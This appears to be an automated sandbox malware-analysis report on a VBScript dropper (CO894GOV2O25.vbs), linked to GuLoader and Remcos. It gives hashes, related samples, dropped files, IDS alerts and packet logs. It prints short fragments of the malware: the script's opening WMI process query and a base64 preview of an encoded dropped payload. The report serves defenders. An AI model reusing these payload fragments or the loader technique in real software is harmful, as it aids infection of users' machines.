                                                                                  Classification:mal100.troj.expl.evad.winVBS@12/9@3/2
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 74%
                                                                                  • Number of executed functions: 48
                                                                                  • Number of non-executed functions: 7
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .vbs

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 199.232.210.172, 2.16.100.168, 88.221.110.91, 23.60.203.209, 4.175.87.197
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                  • Execution Graph export aborted for target msiexec.exe, PID 8184 because there are no executed function
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7424 because it is empty
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  04:18:57API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                  04:18:59API Interceptor152x Sleep call for process: powershell.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  bg.microsoft.map.fastly.netDIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 199.232.214.172
                                                                                  POETDB24-25771.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.210.172
                                                                                  TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 199.232.210.172
                                                                                  cv(german-v).pdfGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  RYvYMFbc37.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                  • 199.232.210.172
                                                                                  xwM9kaAoeY.batGet hashmaliciousUnknownBrowse
                                                                                  • 199.232.214.172
                                                                                  6DRdNEnOMn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  • 199.232.210.172
                                                                                  fg.exeGet hashmaliciousXWormBrowse
                                                                                  • 199.232.214.172
                                                                                  FUJFazcSyr.exeGet hashmaliciousAsyncRAT, DarkTortilla, XWormBrowse
                                                                                  • 199.232.210.172
                                                                                  Loader.exeGet hashmaliciousQuasarBrowse
                                                                                  • 199.232.210.172

                                                                                  ASNs

                                                                                  No context

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  3b5074b1b5d032e5620f69f9f700ff0eRFQ_25-03010#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  DIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  DPR338178551140224N01_1140224105452W#U00b7pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  z1PO1164031.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  Transferencia Bancaria I2241624AH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  URGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  9098398293892.exeGet hashmaliciousDarkTortilla, MSIL Logger, MassLogger RATBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  rQuotation020525SA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  z68cryptednowwww.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  37f463bf4616ecd445d4a1937da06e19RFQ_25-03010#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  DIR-A_JY4878249#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  Salary List_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  REQ DAMMAM HO PROJECT.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  URGENTE Ref.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  Salary List_pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  New Order.exeGet hashmaliciousDBatLoader, DarkCloudBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174
                                                                                  TNOR_CYCLE_C2_250000615284_32106010359796_E_BDA_0_E_20250310_192757#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 142.250.185.97
                                                                                  • 216.58.212.174

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                  Category:dropped
                                                                                  Size (bytes):73305
                                                                                  Entropy (8bit):7.996028107841645
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:krha8mqJ7v3CeFMz/akys7nSTK7QMuK+C/Oh5:kAOFq+Mba9Ok7C/O/
                                                                                  MD5:83142242E97B8953C386F988AA694E4A
                                                                                  SHA1:833ED12FC15B356136DCDD27C61A50F59C5C7D50
                                                                                  SHA-256:D72761E1A334A754CE8250E3AF7EA4BF25301040929FD88CF9E50B4A9197D755
                                                                                  SHA-512:BB6DA177BD16D163F377D9B4C63F6D535804137887684C113CC2F643CEAB4F34338C06B5A29213C23D375E95D22EF417EAC928822DFB3688CE9E2DE9D5242D10
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MSCF....Y.......,...................I.................;Za. .authroot.stl.98.?.6..CK..<Tk......4..c... .Ec...U.d.d.E&I.DH*..M.KB."..rK.RQ*..}f..f...}..1....9...........$.8q..fa...7.o.1.0...bfsM4.........u..l..0..4.a.t....0.....6#....n. :... ....%.,CQ5uU..(.3.<7#.0..JN.$...=j|w..*.#.oU..Eq[..P..^..~.V...;..m...I|...l..@-W..=.QQ.._./.M.nZ..(.........`.$Z.9wW:W.]..8*E.......I.D{..n...K:.m..^.(.S.......c..s.y..<...2.%o.o.....H.B.R.....11.|!.(...........h.SZ........<...^....Z>.Pp?... .pT@p.#.&..........#VEV=.....p........y..."T=l.n..egf.w..X.Y..-G...........KQ.]...pM..[m..-6.wd:........T...:.P5Zs....c.oT`..F1#......EuD.......7....V ..-....!.N..%S...k...S. ...@.J..../..b!B.(=\../.l......`.\...q9..>4!b..8EH.....zdy.....#...X>%0w...i.,>c.z.g"p.S..2W.+mMs.....5Def.....#._D.4....>}...i...\.&`D.......z;..ZY.3.+t.`....z_.q'w.z.)..j3.+.co.s..:.........qK...{...E....uPO...#vs.XxH.B!..(t. 8k+.....G\..?..GF8....'..w.>.ms..\ve.nFN..W)....xi..u..5.f.l....

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):330
                                                                                  Entropy (8bit):3.2871362927554144
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKZrmcQRnSN+SkQlPlEGYRMY9z+4KlDA3RUeqpGVuys1:RrmfZkPlE99SNxAhUeq8S
                                                                                  MD5:DF3BE5B6BE50B2430E66055D9504A887
                                                                                  SHA1:383179FB448FC8F410CE7F3A3A7AB0EC6897A4C3
                                                                                  SHA-256:DEC2FE849EE47449CD8F3CB274F2FEFB4D69ACE486C4033727233634DE3AA033
                                                                                  SHA-512:4791426DB5725FA3B72158CFAE4CFB0B8F62898AC6D46556F913BB65E14C41D6E3DC8D0AEC1AAD507C60D6AD3DEF990024FE5C002572C2217D949C36BB551346
                                                                                  Malicious:false
                                                                                  Preview:p...... ........<.......(....................................................... ..................(....c*.....Y...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.4.2.7.f.6.c.2.b.7.8.7.d.b.1.:.0."...

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.8908305915084105
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                  MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                  SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                  SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                  SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllultnxj:NllU
                                                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                                  Malicious:false
                                                                                  Preview:@...e................................................@..........

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0n0tdsqb.wik.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gggvt1m.g2n.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkucyjce.3o1.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txiu5ox1.sw3.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Roaming\Udskilleres.Bre

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):470504
                                                                                  Entropy (8bit):5.866336694778678
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:wo+ZRM3t5ba2REpPpZE2AzYtBdk+3AH/lr:/Cqq/pBdkIAf9
                                                                                  MD5:36D6340B2705592404C44C6BAC9A4AB7
                                                                                  SHA1:63CFE9DF5ED9100DA9528D8AC4CA36D00993DE36
                                                                                  SHA-256:BCEF69790038F11891B3A53C318E3AFA2B2189675B29B355411A54DE8AFE136E
                                                                                  SHA-512:DC3572EB08163825847DCFC02DFBA25632BE3D5DCDEC017A4E43F4978DC4C78158DE9C3E10D1F145C39AA9D99C764743AD3F0A7BD1B1FDAB3DBF81A7B464EC8E
                                                                                  Malicious:false
                                                                                  Preview:g/EAweAAu+s7GwCEyYPOAANcJASAyQD4uTn0bReA6gBmg8oAgfHK6tUWg/AA+IHx8x64AZtmgf6SwIPKAID7HbrSQjY9ZoPIAIXSgPMAZoPvADHKg8YAPdG34wmJFAuDxwDZ0NHiIduEwIPBBMHqAJuB+dVmzQV80oTS+ItEJARmg/YANACJw2aD7wBmg+4AgcONX2YEIMn4uqalUJPZ0GaDxwCB8piXMMn4wOEAgcLCzZ+l2dCB/64PSlFmg8sAg84Ag/EAm4sMEPxmwe4AiQwTZoH6A9eAwwBCg8gAwOkAgfrU7wQAddqDzwCbiVwkDCDJZoH/d0WB7QADAABmweYAZsHvAItUJAg81oPCAIt8JAT8ZoPLAInrZsHjAGaDyQCBw5wAAAD8m1MsAIPIAGpAZoH/bZxmweAAievB4wCQx4MAAQAAALDrBWaD7wDA6wCBwwABAACA6gDB6gBTm4PuAInrwOEAwOIAibsEAQAAIMmDzwCBwwQBAACAwQCD8QBTg8EAZoPwAGr/gfvC3+cfweIAg8IFgPEAg+8AMfb8mzHJhdKDwQCLGoPCAGaD8gBBg+4AgPv6ORwKdfRmweoAkEb8+IB8Cvu4deUhycDhAItECvz8gPMAKfDA6QCE0v/SPWuqTz/B6wC61O8EAGYh28HpADHAZoPDAPyLfCQMZsHnAGbB6ACBNAd05VoggMkAgMsAg8AEZsHvAID56znQdeXB4ADZ0In7g84ALAD/1/jB4ACc5VogdNjoYGOBAaSDE5kXTArTxfUJnHmV4tvksrO7JyFsv5lMaRGh9Qxw6Mtx29HpQyNX9STfvXmBPKWmE54ms6FXIJaJC9VMCttUeeWu4ZMmYuP1kVcgIqfgufQeDaEY6Fpgm+n15/EBWyB0UAFAh2Wl8vVIviF05awE9S0817UhNKHBAVsgdCbkTOmD29vKyTyltmT3xHXlWln8Vu2lvaSlrZDkWiABEBup6TNbIHRebmxvrdvT

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with CRLF line terminators
                                                                                  Entropy (8bit):5.216848901408359
                                                                                  TrID:
                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                  File name:CO894GOV2O25.vbs
                                                                                  File size:27'154 bytes
                                                                                  MD5:3ab38d8e692322e55deb91ea33e8305d
                                                                                  SHA1:eeca584df47dca8a53769ed5a8a76223eefb401c
                                                                                  SHA256:dc8799d45d113dd0f36ecd532c6bf3a1040d29ec296bfcce82a9d1d88f17b762
                                                                                  SHA512:4924d0c5871c41a55d9baadd3d07a89710d3d51cdeba70c859faade45dba27ffb32f1ae259b4ca54df83a2bd82b42d60425a4e196ed12586f97c1fbcd24548ac
                                                                                  SSDEEP:384:zAXfS9SL1Xc2sLB4WcYznVvSb2ZF2FpRkx7RecN4WsJvNs5v5BPWtNOg+EcxmPn4:zAodglCeW20auERG0Y5
                                                                                  TLSH:01C227C8C7563BD83943FBF1C40D372C9861D4A1973934782598AA24F96FA86FD26EC4
                                                                                  File Content Preview:......Set Lseprven = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Enhedskuglerne = Lseprven.ExecQuery("Select * from Win32_Process Where Name = 'explorer.e" + "xe'")....For Each Nedvrdigelsernes in Enhedskuglerne....Set Mes

                                                                                  File Icon

                                                                                  Icon Hash:68d69b8f86ab9a86

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2025-03-10T09:19:11.043519+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649689216.58.212.174443TCP
                                                                                  2025-03-10T09:20:18.261217+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649697216.58.212.174443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Mar 10, 2025 09:19:01.740479946 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:01.740523100 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:01.740592003 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:01.748358011 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:01.748384953 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:03.786788940 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:03.786859989 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:03.787585020 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:03.787646055 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:03.792671919 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:03.792694092 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:03.792984009 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:03.800196886 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:03.840336084 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:04.428596020 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:04.428678989 CET44349688216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:04.428755045 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:04.432373047 CET49688443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:08.665096998 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:08.665164948 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:08.665318966 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:08.665900946 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:08.665924072 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:10.399347067 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:10.402086020 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:10.402107954 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:11.043297052 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:11.045175076 CET44349689216.58.212.174192.168.2.6
                                                                                  Mar 10, 2025 09:19:11.045288086 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:11.045737028 CET49689443192.168.2.6216.58.212.174
                                                                                  Mar 10, 2025 09:19:11.046340942 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:11.046374083 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:11.046811104 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:11.046811104 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:11.046833038 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:12.855691910 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:12.855818033 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:12.880139112 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:12.880160093 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:12.880495071 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:12.892139912 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:12.932320118 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.039412975 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.039612055 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.058706999 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.059401035 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.064964056 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.065565109 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.072145939 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.125581980 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.129694939 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.160459042 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.160690069 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.160706043 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.163625956 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.163978100 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.163990021 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.170156956 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.170347929 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.170367956 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.175465107 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.175930023 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.175940990 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.181910992 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.182287931 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.182303905 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.189506054 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.189692020 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.189703941 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.195492983 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.196217060 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.196229935 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.202096939 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.203615904 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.203633070 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.212243080 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.214292049 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.214353085 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.214473009 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.214473009 CET49690443192.168.2.6142.250.185.97
                                                                                  Mar 10, 2025 09:19:16.214493990 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.221118927 CET44349690142.250.185.97192.168.2.6
                                                                                  Mar 10, 2025 09:19:16.224112034 CET49690443192.168.2.6142.250.185.97
